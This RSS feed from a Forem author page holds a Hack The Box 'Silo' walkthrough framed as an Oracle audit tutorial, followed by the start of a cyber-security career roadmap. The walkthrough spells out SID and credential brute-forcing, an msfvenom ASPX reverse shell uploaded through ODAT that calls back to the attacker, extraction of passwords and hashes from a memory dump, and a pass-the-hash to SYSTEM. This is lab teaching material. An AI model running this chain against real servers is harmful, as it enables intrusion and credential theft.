<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: Ferdi Birgül </title>
    <description>The latest articles on Forem by Ferdi Birgül  (@ferdibrgl).</description>
    <link>https://forem.com/ferdibrgl</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F938547%2Fdf0e68dd-f883-4614-b437-8d887ce96fca.jpg</url>
      <title>Forem: Ferdi Birgül </title>
      <link>https://forem.com/ferdibrgl</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/ferdibrgl"/>
    <language>en</language>
    <item>
      <title>How to audit an Oracle database</title>
      <dc:creator>Ferdi Birgül </dc:creator>
      <pubDate>Tue, 12 Dec 2023 00:24:25 +0000</pubDate>
      <link>https://forem.com/ferdibrgl/how-to-audit-an-oracle-database-nj9</link>
      <guid>https://forem.com/ferdibrgl/how-to-audit-an-oracle-database-nj9</guid>
      <description>&lt;p&gt;&lt;strong&gt;With this tutorial you will learn:&lt;/strong&gt;&lt;br&gt;
How to perform a simple port scan with Nmap.&lt;br&gt;
How to perform a brute force attack to discover an Oracle TNS SID.&lt;br&gt;
Aprender a utilizar la ODAT - (Oracle Database Attack Tool).&lt;br&gt;
How to attack an Oracle server with Metasploit Framework.&lt;br&gt;
How to perform forensic analysis with Volatility.&lt;br&gt;
How to extract password hashes in a memory dump.&lt;br&gt;
How to perform a privilege escalation using the pass the hash technique.&lt;br&gt;
Hacking Silo&lt;br&gt;
As always, we are going to start listing our victim. To do this, we will perform a simple scan with Nmap, as follows.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;╭─[/Ethic4l-Hacking/Operations/Silo]─[root@Arthorias]─[0]─[4438]
╰─[:)] # nmap -sS -T4 -sV -sC 10.10.10.82
Nmap scan report for 10.10.10.82
Host is up (0.097s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49161/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2018-08-03 12:12:21
|_  start_date: 2018-08-03 11:47:06
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Service detection performed. Please report any incorrect results at &lt;a href="https://nmap.org/submit/"&gt;https://nmap.org/submit/&lt;/a&gt; .&lt;br&gt;
Nmap done: 1 IP address (1 host up) scanned in 171.99 seconds&lt;br&gt;
With the result of the previous scan, we could see that this server probably has Windows Server 2008 R2 and on the other hand has port 80 enabled (Microsoft IIS httpd 8.5).&lt;br&gt;
For this pentesting, we are going to focus on port 1521, which indicates to be an oracle-tns service.&lt;/p&gt;
&lt;h2&gt;
  
  
  &lt;strong&gt;Brute force to identify the SID&lt;/strong&gt;
&lt;/h2&gt;

&lt;p&gt;To continue, we are going to audit this Oracle database with the ODAT tool.&lt;br&gt;
ODAT is an open source pentesting tool designed to attack and audit the security of Oracle Database servers.&lt;br&gt;
The next steps are:&lt;/p&gt;

&lt;p&gt;List Oracle Database Version&lt;br&gt;
Discovery of SIDs (An ID is represented as a unique “database instance”)&lt;br&gt;
Obtain a user account (Through bruteforcing)&lt;br&gt;
Exploitation / Escalation of privileges.&lt;br&gt;
We can use the ODAT_ follower to find out either:_&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;`╭─[/Ethic4l-Hacking/Operations/Silo]─[root@Arthorias]─[0]─[4438]
╰─[:)] # ./odat.py sidguesser -s 10.10.10.82

[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'SAMPLE' is a valid SID. Continue...
[+] 'SCAN4' is a valid SID. Continue...
[+] 'XE' is a valid SID. Continue...
[+] 'XEXDB' is a valid SID. Continue...
100% |##############################################| Time: 00:10:55
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |##############################################| Time: 00:00:12
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue...
100% |##############################################| Time: 00:07:31
[+] SIDs found on the 10.10.10.82:1521 server: SAMPLE,SCAN4,XE,XEXDB
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Brute force to find correct credentials
&lt;/h2&gt;

&lt;p&gt;From the results, we identified 4 possible SIDs (SAMPLE,SCAN4,XE,XEXDB).`&lt;br&gt;
Next, we will need to identify valid credentials to authenticate to the database.&lt;br&gt;
For this task, we can use a metasploit helper module called oracle_login.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;&lt;/code&gt;`&lt;br&gt;
msf5 &amp;gt; use admin/oracle/oracle_login&lt;br&gt;
msf5 auxiliary(admin/oracle/oracle_login) &amp;gt; set RHOST 10.10.10.82&lt;br&gt;
RHOST =&amp;gt; 10.10.10.82&lt;br&gt;
msf5 auxiliary(admin/oracle/oracle_login) &amp;gt; set SID XE&lt;br&gt;
SID =&amp;gt; XE&lt;br&gt;
msf5 auxiliary(admin/oracle/oracle_login) &amp;gt; run -j&lt;br&gt;
[*] Auxiliary module running as background job 0.&lt;/p&gt;

&lt;p&gt;[&lt;em&gt;] Starting brute force on 10.10.10.82:1521...&lt;br&gt;
[+] Found user/pass of: scott/tiger on 10.10.10.82 with sid XE&lt;br&gt;
[&lt;/em&gt;] Auxiliary module execution completed&lt;br&gt;
`&lt;code&gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Very good. We found a valid credential.&lt;br&gt;
Another way to detect valid credentials is to use a list of default credentials.&lt;br&gt;
Valid credentials mean we can connect to the XE instance and start querying the database for possible information. It turns out that scott also has the SYSBDA privilege . Think of it as something similar to sudo - it gives you extra flexibility and greater privileges in case you want to do any database alterations, user administration, the list goes on.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;Oracle Database Penetration Testing&lt;/code&gt;&lt;br&gt;
Now that we have a valid SID and credentials, we can connect to the database for manual enumeration.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;&lt;/code&gt;&lt;code&gt;&lt;br&gt;
&lt;/code&gt;╭─[/opt/oracle]─[root@Arthorias]─[0]─[4438]&lt;br&gt;
╰─[:)] # sqlplus scott/&lt;a href="mailto:tiger@10.10.10.82"&gt;tiger@10.10.10.82&lt;/a&gt;:1521/XE&lt;/p&gt;

&lt;p&gt;SQL*Plus: Release 12.1.0.2.0 Production on Tue Oct 3 12:56:27 2019&lt;/p&gt;

&lt;p&gt;Copyright (c) 1982, 2014, Oracle.  All rights reserved.&lt;/p&gt;

&lt;p&gt;Connected to:&lt;br&gt;
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production&lt;/p&gt;

&lt;p&gt;SQL&amp;gt; select * from v$version;&lt;/p&gt;

&lt;h2&gt;
  
  
  BANNER
&lt;/h2&gt;

&lt;p&gt;Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production&lt;br&gt;
PL/SQL Release 11.2.0.2.0 - Production&lt;br&gt;
CORE 11.2.0.2.0 Production&lt;br&gt;
TNS for 64-bit Windows: Version 11.2.0.2.0 - Production&lt;br&gt;
NLSRTL Version 11.2.0.2.0 - Production&lt;code&gt;&lt;br&gt;
&lt;/code&gt;&lt;code&gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;To start, we can check the privileges and roles of the users.&lt;/p&gt;

&lt;p&gt;SQL&amp;gt; SELECT * FROM user_role_privs;             &lt;/p&gt;

&lt;p&gt;&lt;code&gt;&lt;/code&gt;`&lt;br&gt;
USERNAME               GRANTED_ROLE           ADM DEF OS_&lt;/p&gt;




&lt;p&gt;SCOTT                  CONNECT                NO  YES NO&lt;br&gt;
SCOTT           &lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;   RESOURCE               NO  YES NO
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;`&lt;code&gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;As you can see, Scott is a low privileged user on the system. In order to gain access to the shell, we might need to escalate our privilege to DBA first and perform some known attacks on Oracle. To achieve this easily, we can use a tool called ODAT (Oracle Database Attack Tool) . It is an open source tool used to automate attacks on an Oracle database.&lt;/p&gt;

&lt;p&gt;Before we can use ODAT, we need to install it in Kali first. You can refer to this installation guide to install it successfully.&lt;/p&gt;

&lt;h2&gt;
  
  
  Usando ODAT - (Oracle Database Attack Tool)
&lt;/h2&gt;

&lt;p&gt;Initially, we will run all the ODAT modules on our victim server.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;&lt;/code&gt;&lt;code&gt;&lt;br&gt;
&lt;/code&gt;╭─[/Ethic4l-Hacking/Operations/Silo/ODAT]─[root@Arthorias]─[0]─[4438]&lt;br&gt;
╰─[:)] # python odat.py all -s 10.10.10.82 -d XE -U scott -P tiger&lt;/p&gt;

&lt;p&gt;&lt;a href="//10.10.10.82:1521"&gt;1&lt;/a&gt;: Is it vulnerable to TNS poisoning (CVE-2012-1675)?&lt;br&gt;
[+] The target is vulnerable to a remote TNS poisoning&lt;/p&gt;

&lt;p&gt;&lt;a href="//10.10.10.82:1521"&gt;2&lt;/a&gt;: Testing all modules on the XE SID with the scott/tiger account&lt;br&gt;
[2.1] UTL_HTTP library ?&lt;br&gt;
[-] KO&lt;br&gt;
[2.2] HTTPURITYPE library ?&lt;br&gt;
[+] OK&lt;br&gt;
[2.3] UTL_FILE library ?&lt;br&gt;
[-] KO&lt;br&gt;
[2.4] JAVA library ?&lt;br&gt;
[-] KO&lt;br&gt;
[2.5] DBMSADVISOR library ?&lt;br&gt;
[+] OK&lt;br&gt;
[2.6] DBMSSCHEDULER library ?&lt;br&gt;
[-] KO&lt;br&gt;
[2.7] CTXSYS library ?&lt;br&gt;
[-] KO&lt;br&gt;
[2.8] Hashed Oracle passwords ?&lt;br&gt;
[+] OK&lt;br&gt;
[2.9] Hashed Oracle passwords from history?&lt;br&gt;
[-] KO&lt;br&gt;
[2.10] DBMS_XSLPROCESSOR library ?&lt;br&gt;
[+] OK&lt;br&gt;
[2.11] External table to read files ?&lt;br&gt;
[-] KO&lt;br&gt;
[2.12] External table to execute system commands ?&lt;br&gt;
[-] KO&lt;br&gt;
[2.13] Oradbg ?&lt;br&gt;
[-] KO&lt;br&gt;
[2.14] DBMS_LOB to read files ?&lt;br&gt;
[+] OK&lt;br&gt;
[2.15] SMB authentication capture ?&lt;br&gt;
[-] KO&lt;br&gt;
[2.17] Modify any table while/when he can select it only normally (CVE-2014-4237)?&lt;br&gt;
[-] KO&lt;br&gt;
[2.18] Obtain the session key and salt for arbitrary Oracle users (CVE-2012-3137)?&lt;br&gt;
[-] KO&lt;code&gt;&lt;br&gt;
&lt;/code&gt;&lt;code&gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;The DBMS_XSLPROCESSOR library is enabled and therefore allows us to put any file on the machine.&lt;br&gt;
First, we'll create a simple text file and check if we can successfully upload it to wwwroot .&lt;/p&gt;

&lt;p&gt;&lt;code&gt;&lt;/code&gt;&lt;code&gt;&lt;br&gt;
&lt;/code&gt;╭─[/Ethic4l-Hacking/Operations/Silo/ODAT]─[root@Arthorias]─[0]─[4438]&lt;br&gt;
╰─[:)] # echo "Hacked By Gerh" &amp;gt; File-Test.txt&lt;/p&gt;

&lt;p&gt;╭─[/Ethic4l-Hacking/Operations/Silo/ODAT]─[root@Arthorias]─[0]─[4439]&lt;br&gt;
╰─[:)] # python odat.py dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile "c:\inetpub\wwwroot" "File-Test.txt" "/tmp/File-Test.txt"&lt;/p&gt;

&lt;p&gt;&lt;a href="//10.10.10.82:1521"&gt;1&lt;/a&gt;: Put the /root/Desktop/File-Test.txt local file in the C:\inetpub\wwwroot\ folder like File-Test.txt on the 10.10.10.82 server&lt;br&gt;
[+] The /root/Desktop/File-Test.txt file was created on the C:\inetpub\wwwroot\ directory on the 10.10.10.82 server like the File-Test.txt file`&lt;/p&gt;

&lt;p&gt;`&lt;code&gt;&lt;/code&gt;&lt;br&gt;
As you can see, we can upload the file successfully. Let's check using curl .&lt;/p&gt;

&lt;p&gt;&lt;code&gt;&lt;/code&gt;&lt;code&gt;&lt;br&gt;
╭&lt;/code&gt;─[/Ethic4l-Hacking/Operations/Silo/ODAT]─[root@Arthorias]─[0]─[4438]&lt;br&gt;
╰─[:)] # curl &lt;a href="http://10.10.10.82/File-Test.txt"&gt;http://10.10.10.82/File-Test.txt&lt;/a&gt;&lt;br&gt;
Hacked By ferdi&lt;code&gt;&lt;br&gt;
&lt;/code&gt;&lt;code&gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Now that we can load to the target system, we can easily generate a reverse shell with ASPX using msfvenom, load it using ODAT, and activate it to gain access to the shell.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;&lt;/code&gt;&lt;code&gt;&lt;br&gt;
&lt;/code&gt;╭─[/Ethic4l-Hacking/Operations/Silo/ODAT]─[root@Arthorias]─[0]─[4438]&lt;br&gt;
╰─[:)] # msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.15.110 LPORT=443 -f aspx &amp;gt; /tmp/shell.aspx&lt;br&gt;
No platform was selected, choosing Msf::Module::Platform::Windows from the payload&lt;br&gt;
No encoder or badchars specified, outputting raw payload&lt;br&gt;
Payload size: 500 bytes&lt;br&gt;
Final size of aspx file: 3606 bytes`&lt;/p&gt;

&lt;p&gt;&lt;code&gt;╭─[/Ethic4l-Hacking/Operations/Silo/ODAT]─[root@Arthorias]─[0]─[4438]&lt;br&gt;
╰─[:)] # python odat.py dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile "c:\\inetpub\\wwwroot" "shell.aspx" "/tmp/shell.aspx"&lt;br&gt;
[1] (10.10.10.82:1521): Put the /tmp/shell.aspx local file in the C:\inetpub\wwwroot\ folder like shell.aspx on the 10.10.10.82 server&lt;br&gt;
[+] The /root/Desktop/shell.aspx file was created on the C:\inetpub\wwwroot\ directory on the 10.10.10.82 server like the shell.aspx file&lt;/code&gt;&lt;br&gt;
`&lt;code&gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;After uploading our shell, we will start the Metasploit framework and configure it to listen on the ports previously indicated.&lt;br&gt;
Subsequently, we only have to make a request to the route &lt;a href="http://10.10.10.82/shell.aspx"&gt;http://10.10.10.82/shell.aspx&lt;/a&gt; and in a console establish a listener to receive our reverse shell.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;&lt;/code&gt;&lt;code&gt;&lt;br&gt;
&lt;/code&gt;╭─[/Ethic4l-Hacking/Operations/Silo/ODAT]─[root@Arthorias]─[0]─[4438]&lt;br&gt;
╰─[:)] # msfconsole&lt;br&gt;
msf5 exploit(multi/handler) &amp;gt; set LHOST 10.10.14.110&lt;br&gt;
LHOST =&amp;gt; 10.10.14.110&lt;br&gt;
msf5 exploit(multi/handler) &amp;gt; set LPORT 443&lt;br&gt;
LPORT =&amp;gt; 443&lt;br&gt;
msf5 exploit(multi/handler) &amp;gt; exploit&lt;/p&gt;

&lt;p&gt;[&lt;em&gt;] Started reverse TCP handler on 10.10.14.110:443 &lt;br&gt;
[&lt;/em&gt;] Meterpreter session 1 opened (10.10.14.110:443 -&amp;gt; 10.10.10.82:49177) at 2019-10-03 21:43:08 &lt;/p&gt;

&lt;p&gt;Microsoft Windows &lt;a href="https://dev.toc"&gt;Version 6.3.9600&lt;/a&gt; 2013 Microsoft Corporation. All rights reserved.&lt;/p&gt;

&lt;p&gt;c:\windows\system32\inetsrv&amp;gt; whoami&lt;br&gt;
whoami&lt;br&gt;
iis apppool\defaultapppool&lt;code&gt;&lt;br&gt;
&lt;/code&gt;&lt;code&gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Ready, we now have a Shell and with it we can execute commands on the server.&lt;/p&gt;

&lt;h2&gt;
  
  
  Privilege Escalation
&lt;/h2&gt;

&lt;p&gt;As you can see, there is a file called “Oracle issue.txt” in the Desktop directory. This could hold a clue to our privilege escalation vector.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;&lt;/code&gt;&lt;code&gt;&lt;br&gt;
&lt;/code&gt;C:\Users\Phineas\Desktop&amp;gt; type "Oracle issue.txt"&lt;br&gt;
type "Oracle issue.txt"&lt;br&gt;
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):&lt;/p&gt;

&lt;p&gt;Dropbox link provided to vendor (and password under separate cover).&lt;/p&gt;

&lt;p&gt;Dropbox link &lt;br&gt;
&lt;a href="https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0"&gt;https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;link password:&lt;br&gt;
£%Hm8646uC$`&lt;/p&gt;

&lt;p&gt;`&lt;code&gt;&lt;/code&gt;&lt;br&gt;
The text file mentions a core dump. That's a good sign for us, because there is a high probability that that memory dump contains valuable information. Many tools will analyze memory for us and pull out valuable things like passwords. So it's pretty clear that we need to do some memory analysis.&lt;br&gt;
After downloading the zip file, we unzip it and discover that it contains a core dump. We use the volatility tool to investigate the dump.&lt;br&gt;
`&lt;/p&gt;

&lt;p&gt;Using Volatility to Extract Passwords&lt;br&gt;
`&lt;br&gt;
After downloading the crash dump, we can use volatility on it to perform forensic analysis. Volatility is built into Kali, so there is no need to do an additional installation. If you're not familiar with Volatility, you can check out this SANS cheat sheet .&lt;br&gt;
For the initial step, we would need to identify the OS version of the machine where the crash dump was taken so that the volatility plugins are accurate. Although we can simply issue a systeminfo command in our shell session, we can also identify this using a volatility plugin called imageinfo .&lt;/p&gt;

&lt;p&gt;&lt;code&gt;&lt;/code&gt;&lt;code&gt;&lt;br&gt;
&lt;/code&gt;╭─[/Ethic4l-Hacking/Operations/Silo]─[root@Arthorias]─[0]─[4438]&lt;br&gt;
╰─[:)] # volatility -f SILO-20180105-221806.dmp imageinfo&lt;br&gt;
Volatility Foundation Volatility Framework 2.6&lt;br&gt;
          Suggested Profile(s) : Win8SP0x64, Win10x64_17134, Win81U1x64, Win10x64_10240_17770, Win2012R2x64_18340, Win10x64_14393, Win10x64, Win2016x64_14393, Win10x64_16299, Win2012R2x64, Win2012x64, Win8SP1x64_18340, Win10x64_10586, Win8SP1x64, Win10x64_15063 (Instantiated with Win10x64_15063)&lt;br&gt;
                     AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS)&lt;br&gt;
                     AS Layer2 : WindowsCrashDumpSpace64 (Unnamed AS)&lt;br&gt;
                     AS Layer3 : FileAddressSpace (/datos/gerh/Escritorio/Prometheus/Ethic4l-Hacking/Operations/Premium/Silo/SILO-20180105-221806.dmp)&lt;br&gt;
                      PAE type : No PAE&lt;br&gt;
                           DTB : 0x1a7000L&lt;br&gt;
                          KDBG : 0xf80078520a30L&lt;br&gt;
          Number of Processors : 2&lt;br&gt;
     Image Type (Service Pack) : 0&lt;br&gt;
                KPCR for CPU 0 : 0xfffff8007857b000L&lt;br&gt;
                KPCR for CPU 1 : 0xffffd000207e8000L&lt;br&gt;
             KUSER_SHARED_DATA : 0xfffff78000000000L&lt;br&gt;
           Image date and time : 2018-01-05 22:18:07 UTC+0000&lt;br&gt;
     Image local date and time : 2018-01-05 22:18:07 +0000`&lt;/p&gt;

&lt;p&gt;`&lt;code&gt;&lt;/code&gt;&lt;br&gt;
One of the useful plugins that we can use in this situation is lsadump. The lsadump plugin dumps the decrypted LSA secrets from the registry. This exposes information such as the default password (for systems with autologin enabled), RDP public keys, and credentials used by DPAPI .&lt;/p&gt;

&lt;p&gt;&lt;code&gt;&lt;/code&gt;&lt;code&gt;&lt;br&gt;
&lt;/code&gt;╭─[/Ethic4l-Hacking/Operations/Silo]─[root@Arthorias]─[0]─[4438]&lt;br&gt;
╰─[:)] # volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 lsadump&lt;br&gt;
Volatility Foundation Volatility Framework 2.6&lt;br&gt;
DefaultPassword&lt;br&gt;
0x00000000  1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................&lt;br&gt;
0x00000010  44 00 6f 00 4e 00 6f 00 74 00 48 00 40 00 63 00   &lt;a href="mailto:D.o.N.o.t.H.@.c"&gt;D.o.N.o.t.H.@.c&lt;/a&gt;.&lt;br&gt;
0x00000020  6b 00 4d 00 65 00 42 00 72 00 6f 00 21 00 00 00   k.M.e.B.r.o.!...&lt;/p&gt;

&lt;p&gt;DPAPI_SYSTEM&lt;br&gt;
0x00000000  2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ,...............&lt;br&gt;
0x00000010  01 00 00 00 cf 25 94 31 34 9e ae 43 2d 8b 87 ac   .....%.14..C-...&lt;br&gt;
0x00000020  f2 a7 74 1c 6d ec 1c 04 08 43 a8 a6 a9 42 62 f7   ..t.m....C...Bb.&lt;br&gt;
0x00000030  55 70 48 bb 17 7d 82 fe 79 49 02 bd 00 00 00 00   UpH..}..yI......`&lt;/p&gt;

&lt;p&gt;`&lt;code&gt;&lt;/code&gt;&lt;br&gt;
As you can see in the lsadump results, we were able to acquire a plaintext password DoNotH@ckMeBro! .&lt;br&gt;
Since the SMB service is accessible over the network, we can use winexe to log in via SMB.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;&lt;/code&gt;&lt;code&gt;&lt;br&gt;
&lt;/code&gt;╭─[/Ethic4l-Hacking/Operations/Silo]─[root@Arthorias]─[0]─[4438]&lt;br&gt;
╰─[:)] # winexe -U Administrator //10.10.10.82 cmd.exe&lt;br&gt;
Enter password: DoNotH@ckMeBro!&lt;/p&gt;

&lt;p&gt;Microsoft Windows &lt;a href="https://dev.toc"&gt;Version 6.3.9600&lt;/a&gt; 2013 Microsoft Corporation. All rights reserved.&lt;/p&gt;

&lt;p&gt;C:\Windows\system32&amp;gt;whoami&lt;br&gt;
whoami&lt;br&gt;
silo\administrator`&lt;/p&gt;

&lt;p&gt;`&lt;code&gt;&lt;/code&gt;&lt;br&gt;
Another way we could have escalated privileges is through the hivelist plugin .&lt;/p&gt;

&lt;p&gt;&lt;code&gt;&lt;/code&gt;`&lt;/p&gt;

&lt;p&gt;`&lt;code&gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;&lt;/code&gt;&lt;code&gt;&lt;br&gt;
&lt;/code&gt;╭─[/Ethic4l-Hacking/Operations/Silo]─[root@Arthorias]─[0]─[4438]&lt;br&gt;
╰─[:)] # volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hivelist &lt;br&gt;
Volatility Foundation Volatility Framework 2.6&lt;br&gt;
Virtual            Physical           Name&lt;/p&gt;




&lt;p&gt;0xffffc0000100a000 0x000000000d40e000 \??\C:\Users\Administrator\AppData\Local\Microsoft\Windows\UsrClass.dat&lt;br&gt;
0xffffc000011fb000 0x0000000034570000 \SystemRoot\System32\config\DRIVERS&lt;br&gt;
0xffffc00001600000 0x000000003327b000 \??\C:\Windows\AppCompat\Programs\Amcache.hve&lt;br&gt;
0xffffc0000001e000 0x0000000000b65000 [no name]&lt;br&gt;
0xffffc00000028000 0x0000000000a70000 \REGISTRY\MACHINE\SYSTEM&lt;br&gt;
0xffffc00000052000 0x000000001a25b000 \REGISTRY\MACHINE\HARDWARE&lt;br&gt;
0xffffc000004de000 0x0000000024cf8000 \Device\HarddiskVolume1\Boot\BCD&lt;br&gt;
0xffffc00000103000 0x000000003205d000 \SystemRoot\System32\Config\SOFTWARE&lt;br&gt;
0xffffc00002c43000 0x0000000028ecb000 \SystemRoot\System32\Config\DEFAULT&lt;br&gt;
0xffffc000061a3000 0x0000000027532000 \SystemRoot\System32\Config\SECURITY&lt;br&gt;
0xffffc00000619000 0x0000000026cc5000 \SystemRoot\System32\Config\SAM&lt;br&gt;
0xffffc0000060d000 0x0000000026c93000 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT&lt;br&gt;
0xffffc000006cf000 0x000000002688f000 \SystemRoot\System32\Config\BBI&lt;br&gt;
0xffffc000007e7000 0x00000000259a8000 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT&lt;br&gt;
0xffffc00000fed000 0x000000000d67f000 &lt;br&gt;
\??\C:\Users\Administrator\ntuser.dat&lt;code&gt;&lt;br&gt;
&lt;/code&gt;&lt;code&gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Now we can dump the hashes by supplying the addresses related to SYSTEM and SAM.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Note: To use hashdump, you must specify the virtual address of the SYSTEM column with the -y parameter and the virtual address of the SAM column with the -s parameter.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;code&gt;&lt;/code&gt;&lt;code&gt;&lt;br&gt;
&lt;/code&gt;╭─[/Ethic4l-Hacking/Operations/Silo]─[root@Arthorias]─[0]─[4438]&lt;br&gt;
╰─[:)] # volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hashdump -y 0xffffc00000028000 -s 0xffffc00000619000&lt;br&gt;
Volatility Foundation Volatility Framework 2.6&lt;br&gt;
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::&lt;br&gt;
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::&lt;br&gt;
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::&lt;code&gt;&lt;br&gt;
&lt;/code&gt;&lt;code&gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;We could try to crack these, but first, let's try the pass the hash attack:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;&lt;/code&gt;`&lt;br&gt;
╭─[/Ethic4l-Hacking/Operations/Silo]─[root@Arthorias]─[0]─[4438]&lt;br&gt;
╰─[:)] # /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 -target-ip 10.10.10.82&lt;br&gt;
 &lt;a href="mailto:administrator@10.10.10.82"&gt;administrator@10.10.10.82&lt;/a&gt;&lt;br&gt;
Impacket v0.9.16-dev - Copyright 2002-2018 Core Security Technologies&lt;/p&gt;

&lt;p&gt;[&lt;em&gt;] Requesting shares on 10.10.10.82.....&lt;br&gt;
[&lt;/em&gt;] Found writable share ADMIN$&lt;br&gt;
[&lt;em&gt;] Uploading file XryxqKFr.exe&lt;br&gt;
[&lt;/em&gt;] Opening SVCManager on 10.10.10.82.....&lt;br&gt;
[&lt;em&gt;] Creating service PAYb on 10.10.10.82.....&lt;br&gt;
[&lt;/em&gt;] Starting service PAYb.....&lt;br&gt;
[!] Press help for extra shell commands&lt;br&gt;
Microsoft Windows &lt;a href="https://dev.toc"&gt;Version 6.3.9600&lt;/a&gt; 2013 Microsoft Corporation. All rights reserved.&lt;/p&gt;

&lt;p&gt;C:\Windows\system32&amp;gt;whoami&lt;br&gt;
nt authority\system&lt;code&gt;&lt;br&gt;
&lt;/code&gt;&lt;code&gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;don't forget to follow for more thank you very much &lt;em&gt;Ferdi Birgül&lt;/em&gt; &lt;/p&gt;

&lt;p&gt;cyber security expert&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Complete Roadmap for Cyber Security Career Path</title>
      <dc:creator>Ferdi Birgül </dc:creator>
      <pubDate>Fri, 08 Dec 2023 15:59:35 +0000</pubDate>
      <link>https://forem.com/ferdibrgl/complete-roadmap-for-cyber-security-career-path-2cpk</link>
      <guid>https://forem.com/ferdibrgl/complete-roadmap-for-cyber-security-career-path-2cpk</guid>
      <description>&lt;p&gt;Below are some basic requirements and steps to become a cyber security expert:&lt;/p&gt;

&lt;p&gt;*&lt;em&gt;**Step 1: Education Requirements&lt;/em&gt;*&lt;br&gt;
**&lt;br&gt;
Firstly, you must fulfil the basic educational requirement to pursue your career in cyber security. You should have a bachelor's degree in computer science, information technology or a similar field with an emphasis on cyber security.&lt;/p&gt;

&lt;p&gt;Obtaining a bachelor's degree in the mentioned fields can help you gain basic knowledge about firewalls, computer networks, cyber security measures, cryptography and coding. To be successful in this field it is essential to be proficient in programming languages.&lt;/p&gt;

